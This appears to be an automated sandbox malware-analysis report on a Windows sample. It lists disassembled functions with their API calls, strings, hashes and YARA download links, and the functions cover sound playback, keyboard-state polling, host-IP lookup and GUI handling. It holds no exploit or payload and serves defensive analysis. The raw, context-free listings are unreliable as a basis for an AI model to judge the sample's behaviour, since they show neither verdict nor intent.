Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: e45e3c04fd170ce520746f34332376ad1678787c78460aeb301ec47046da5cc4
Instruction ID: 1ee7201adefd3e9a19582fbdc29fa994b34982311f1bae65ca7540834cf4f881
Opcode Fuzzy Hash: e45e3c04fd170ce520746f34332376ad1678787c78460aeb301ec47046da5cc4
Instruction Fuzzy Hash: A241503050525ECBCF10EF90E891AEA3764EF6A344F1164A9FD917B291E730AD1AC760

Function 00E85569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00E27D2C: _memmove.LIBCMT ref: 00E27D66

Part of subcall function 00E27A84: _memmove.LIBCMT ref: 00E27B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E855D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E855E8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E855F9
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E8560B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E8561C

Strings

play PlayMe, xrefs: 00E85617
close PlayMe, xrefs: 00E855E3, 00E85610
open , xrefs: 00E85581
status PlayMe mode, xrefs: 00E855CD
alias PlayMe, xrefs: 00E855AB
play PlayMe wait, xrefs: 00E85606

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 5facebee9e7d2c32735b5db5ed66afa8fcc19cb4440a67f656474f0052d4b57d
Instruction ID: f2a1b6419aaa24ade0b617225148962875463d7fb6f8e5cf54e8b7b721615a4e
Opcode Fuzzy Hash: 5facebee9e7d2c32735b5db5ed66afa8fcc19cb4440a67f656474f0052d4b57d
Instruction Fuzzy Hash: 7B11B22199026979D720B761DC4ADFF7BBDEF92B00F44242AB409B20D1EEA01E06C6B1

Function 00E848F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00E8490E
gethostname.WSOCK32(?,00000100), ref: 00E84928
gethostbyname.WSOCK32(?), ref: 00E84935
_wcscpy.LIBCMT ref: 00E8495D
_memmove.LIBCMT ref: 00E84970
inet_ntoa.WSOCK32(?), ref: 00E8497B
_strcat.LIBCMT ref: 00E84989
_wcscpy.LIBCMT ref: 00E849A0
WSACleanup.WSOCK32 ref: 00E849AE
_wcscpy.LIBCMT ref: 00E849BC

Strings

0.0.0.0, xrefs: 00E84957

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: d8bf6096de3f669d3eec556de6bf9145cf3f75d072bfba896cfc8ec1be6348be
Instruction ID: 1a14d837aaf7010f60a39a350dc1e5c3eb6db6187fa201e2033011ccf5f910ab
Opcode Fuzzy Hash: d8bf6096de3f669d3eec556de6bf9145cf3f75d072bfba896cfc8ec1be6348be
Instruction Fuzzy Hash: 2E11F371904116AFCB34BBA4AC06EDB77ECDF85710F0411B6F50CB6091EF749A858765

Function 00E85217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00E8521C

Part of subcall function 00E40719: timeGetTime.WINMM(?,75A8B400,00E30FF9), ref: 00E4071D

Sleep.KERNEL32(0000000A), ref: 00E85248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00E8526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E8528E
SetActiveWindow.USER32 ref: 00E852AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E852BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 00E852DA
Sleep.KERNEL32(000000FA), ref: 00E852E5
IsWindow.USER32 ref: 00E852F1
EndDialog.USER32(00000000), ref: 00E85302

Strings

BUTTON, xrefs: 00E85280

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 7a21ad06645d282fafbde9c2f0ba926e5e28b3c508baf8ff74fff8d3919dce96
Instruction ID: 1d6e8c883383bce1cddfa25d2d9b21decd4bf67a7ec75542cf93397e7d0db292
Opcode Fuzzy Hash: 7a21ad06645d282fafbde9c2f0ba926e5e28b3c508baf8ff74fff8d3919dce96
Instruction Fuzzy Hash: 3C21A471104B48AFE7007BB2EDC9A353BAAEB5A386F042434F14DB51B1DF61AC0D8B61

Function 00E8D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00E29997: __itow.LIBCMT ref: 00E299C2
Part of subcall function 00E29997: __swprintf.LIBCMT ref: 00E29A0C

CoInitialize.OLE32(00000000), ref: 00E8D855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E8D8E8
SHGetDesktopFolder.SHELL32(?), ref: 00E8D8FC
CoCreateInstance.OLE32(00EB2D7C,00000000,00000001,00EDA89C,?), ref: 00E8D948
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E8D9B7
CoTaskMemFree.OLE32(?,?), ref: 00E8DA0F
_memset.LIBCMT ref: 00E8DA4C
SHBrowseForFolderW.SHELL32(?), ref: 00E8DA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E8DAAB
CoTaskMemFree.OLE32(00000000), ref: 00E8DAB2
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00E8DAE9
CoUninitialize.OLE32(00000001,00000000), ref: 00E8DAEB

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: e103942c09da30f7a2befed6e268f0c14fe893bf7ecbc2ab08bdf0764cf6a1a3
Instruction ID: ea44232c0c93633b163a6f2328c84ebb535f515757b0c04e956b065dd7958d66
Opcode Fuzzy Hash: e103942c09da30f7a2befed6e268f0c14fe893bf7ecbc2ab08bdf0764cf6a1a3
Instruction Fuzzy Hash: 38B10A75A00118AFDB04EFA4D888DAEBBF9FF48314B1494A9F409EB261DB30ED45CB50

Function 00E8052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00E805A7
SetKeyboardState.USER32(?), ref: 00E80612
GetAsyncKeyState.USER32(000000A0), ref: 00E80632
GetKeyState.USER32(000000A0), ref: 00E80649
GetAsyncKeyState.USER32(000000A1), ref: 00E80678
GetKeyState.USER32(000000A1), ref: 00E80689
GetAsyncKeyState.USER32(00000011), ref: 00E806B5
GetKeyState.USER32(00000011), ref: 00E806C3
GetAsyncKeyState.USER32(00000012), ref: 00E806EC
GetKeyState.USER32(00000012), ref: 00E806FA
GetAsyncKeyState.USER32(0000005B), ref: 00E80723
GetKeyState.USER32(0000005B), ref: 00E80731

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: ea5939207319f2eed844fed640f9c9082df0cf6681715c15d6521350defe4b64
Instruction ID: addafdafc5b042c0eb79e73ae0c557f3e472ce6e11eec8a0ef1dae5b3ad89d40
Opcode Fuzzy Hash: ea5939207319f2eed844fed640f9c9082df0cf6681715c15d6521350defe4b64
Instruction Fuzzy Hash: 72512A30A0478829FB75FBB084157EABFF49F01384F08559AC5CE765C2EA64AB4CCB61

Function 00E7C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00E7C746
GetWindowRect.USER32(00000000,?), ref: 00E7C758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00E7C7B6
GetDlgItem.USER32(?,00000002), ref: 00E7C7C1
GetWindowRect.USER32(00000000,?), ref: 00E7C7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00E7C827
GetDlgItem.USER32(?,000003E9), ref: 00E7C835
GetWindowRect.USER32(00000000,?), ref: 00E7C846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00E7C889
GetDlgItem.USER32(?,000003EA), ref: 00E7C897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E7C8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 00E7C8C1

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 4abb4b46bf48a99b1de92fb0891b6f5b916e8d47e2dfb1ccb081a1a83ac6350c
Instruction ID: 7e953469252be9abcba5edea8611ec38d59939147d1feb8caf41d02482807bbb
Opcode Fuzzy Hash: 4abb4b46bf48a99b1de92fb0891b6f5b916e8d47e2dfb1ccb081a1a83ac6350c
Instruction Fuzzy Hash: 44514571B00205AFDB18CFB9DD85A6DBBB9EB89311F14812DF519E7290D770AD44CB50

Function 00E2201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00E21B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E22036,?,00000000,?,?,?,?,00E216CB,00000000,?), ref: 00E21B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E220D3
KillTimer.USER32(-00000001,?,?,?,?,00E216CB,00000000,?,?,00E21AE2,?,?), ref: 00E2216E
DestroyAcceleratorTable.USER32(00000000), ref: 00E5BEF6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E216CB,00000000,?,?,00E21AE2,?,?), ref: 00E5BF27
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E216CB,00000000,?,?,00E21AE2,?,?), ref: 00E5BF3E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E216CB,00000000,?,?,00E21AE2,?,?), ref: 00E5BF5A
DeleteObject.GDI32(00000000), ref: 00E5BF6C

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: ec1476f78e07f1037e7e4174452150d56afa46d352b2f533840aeaea9abfdd70
Instruction ID: 1c718954caeade8e0dead242388dbb2797d4c9602f397ef5008d21920c50c714
Opcode Fuzzy Hash: ec1476f78e07f1037e7e4174452150d56afa46d352b2f533840aeaea9abfdd70
Instruction Fuzzy Hash: E761AF31200664EFCB399F15ED88B2677F1FB5431AF10692DEA427A570C771A898DF90

Function 00E221A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00E225DB: GetWindowLongW.USER32(?,000000EB), ref: 00E225EC

GetSysColor.USER32(0000000F), ref: 00E221D3

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: f8eb01b7568383147cc7c8662c952e721a83c52740170e4115d512544539360e
Instruction ID: 2811d1e0b3032f55cebf0a49dea8fd58e013fbe171230a150a5282147db5bc39
Opcode Fuzzy Hash: f8eb01b7568383147cc7c8662c952e721a83c52740170e4115d512544539360e
Instruction Fuzzy Hash: B441D332001150EFDB255F68EC88BB93765EB1A325F245369FE65BA1F2C7328C46DB21

Function 00E8AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00EAF910), ref: 00E8AB76
GetDriveTypeW.KERNEL32(00000061,00EDA620,00000061), ref: 00E8AC40
_wcscpy.LIBCMT ref: 00E8AC6A

Strings

unknown, xrefs: 00E8AC01
fixed, xrefs: 00E8ABBE
removable, xrefs: 00E8ABA8
cdrom, xrefs: 00E8AB92
network, xrefs: 00E8ABD4
ramdisk, xrefs: 00E8ABEA
all, xrefs: 00E8AB7C

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 2d3b189b01616dbad5debfe8caffb25489db45e64e9c1907a98322c4cceb74b0
Instruction ID: dea0dad20f2fd232d8534ccad89c5a51f36f6321440b903a4e83e441e65d7c46
Opcode Fuzzy Hash: 2d3b189b01616dbad5debfe8caffb25489db45e64e9c1907a98322c4cceb74b0
Instruction Fuzzy Hash: 3B51AF311083019BD710EF14D882AAAB7E5EF84304F18683EF59A772A2DB31DD0ACB53

Function 00EAC27C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E22612: GetWindowLongW.USER32(?,000000EB), ref: 00E22623

Part of subcall function 00E22344: GetCursorPos.USER32(?), ref: 00E22357
Part of subcall function 00E22344: ScreenToClient.USER32(00EE67B0,?), ref: 00E22374
Part of subcall function 00E22344: GetAsyncKeyState.USER32(00000001), ref: 00E22399
Part of subcall function 00E22344: GetAsyncKeyState.USER32(00000002), ref: 00E223A7

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00EAC2E4
ImageList_EndDrag.COMCTL32 ref: 00EAC2EA
ReleaseCapture.USER32 ref: 00EAC2F0
SetWindowTextW.USER32(?,00000000), ref: 00EAC39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00EAC3AD
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00EAC48F

Strings

pr, xrefs: 00EAC3FD
@GUI_DROPID, xrefs: 00EAC3E1
@GUI_DRAGFILE, xrefs: 00EAC424
pr, xrefs: 00EAC438

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$pr$pr
API String ID: 1924731296-488423084
Opcode ID: 1bcbfe62607c3619692cf36ea3e6c1b8f8b63cf097a9c95eb0ce8f3079469ef7
Instruction ID: d3c43520f934c96f7bbf0a9bb4f414466584372b57082e208d8178fa93217354
Opcode Fuzzy Hash: 1bcbfe62607c3619692cf36ea3e6c1b8f8b63cf097a9c95eb0ce8f3079469ef7
Instruction Fuzzy Hash: 5B51BB70204344AFDB14EF20DC96F6A7BE1EB89314F14552DF595AB2E1DB30A948CB52

Function 00E29997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00E299C2
__swprintf.LIBCMT ref: 00E29A0C
__i64tow.LIBCMT ref: 00E5FA0F

Strings

%.15g, xrefs: 00E29A06
True, xrefs: 00E5F9D0
0x%p, xrefs: 00E5F9F1
False, xrefs: 00E5F9D7

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 9afdb2dbabcb15f48196aa637b7bb8ebc2255cab9c0bd60b142fe58ab175a1f6
Instruction ID: eee34db787983cd05b330a9ee8741bf6b6eb54c538b867c2a17de73a714975e2
Opcode Fuzzy Hash: 9afdb2dbabcb15f48196aa637b7bb8ebc2255cab9c0bd60b142fe58ab175a1f6
Instruction Fuzzy Hash: 74410671604615ABDB24EF74E842E7673E8EF88314F20686FE549F7282EA3199458B11

Function 00EA73C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EA73D9
CreateMenu.USER32 ref: 00EA73F4
SetMenu.USER32(?,00000000), ref: 00EA7403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EA7490
IsMenu.USER32(?), ref: 00EA74A6
CreatePopupMenu.USER32 ref: 00EA74B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EA74DD
DrawMenuBar.USER32 ref: 00EA74E5

Strings

F, xrefs: 00EA74D1
0, xrefs: 00EA73CF

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 17bdb891949a903012c5031f39c306ef8b3d4902923d9cace9a06bb3610a575e
Instruction ID: 26b78310fdd21ffa121c83acf94f8712f0d8ee9baf861d9aad1c8893f0d9a639
Opcode Fuzzy Hash: 17bdb891949a903012c5031f39c306ef8b3d4902923d9cace9a06bb3610a575e
Instruction Fuzzy Hash: A0414574A00209EFDB20DFA5D984A9ABBF9FF4E345F144029F9A5AB360D731AD14CB50

Function 00EA772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00EA77CD
CreateCompatibleDC.GDI32(00000000), ref: 00EA77D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00EA77E7
SelectObject.GDI32(00000000,00000000), ref: 00EA77EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 00EA77FA
DeleteDC.GDI32(00000000), ref: 00EA7803
GetWindowLongW.USER32(?,000000EC), ref: 00EA780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00EA7821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00EA782D

Strings

static, xrefs: 00EA7765

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 64a1b266c33dd489f5bfd8fbed0ee5952950d344fd49401be172f180b0da5eb1
Instruction ID: d0ee766acb157261999defb495439a3edfb0d45916c927bb3903f7ce639f28dd
Opcode Fuzzy Hash: 64a1b266c33dd489f5bfd8fbed0ee5952950d344fd49401be172f180b0da5eb1
Instruction Fuzzy Hash: FE318A32105215AFDF119FA5DC08FDB3B69EF0E325F110225FA95BA0A0C735E825DBA4

Function 00E47040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E4707B

Part of subcall function 00E48D68: __getptd_noexit.LIBCMT ref: 00E48D68

__gmtime64_s.LIBCMT ref: 00E47114
__gmtime64_s.LIBCMT ref: 00E4714A
__gmtime64_s.LIBCMT ref: 00E47167
__allrem.LIBCMT ref: 00E471BD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E471D9
__allrem.LIBCMT ref: 00E471F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E4720E
__allrem.LIBCMT ref: 00E47225
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E47243
__invoke_watson.LIBCMT ref: 00E472B4

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

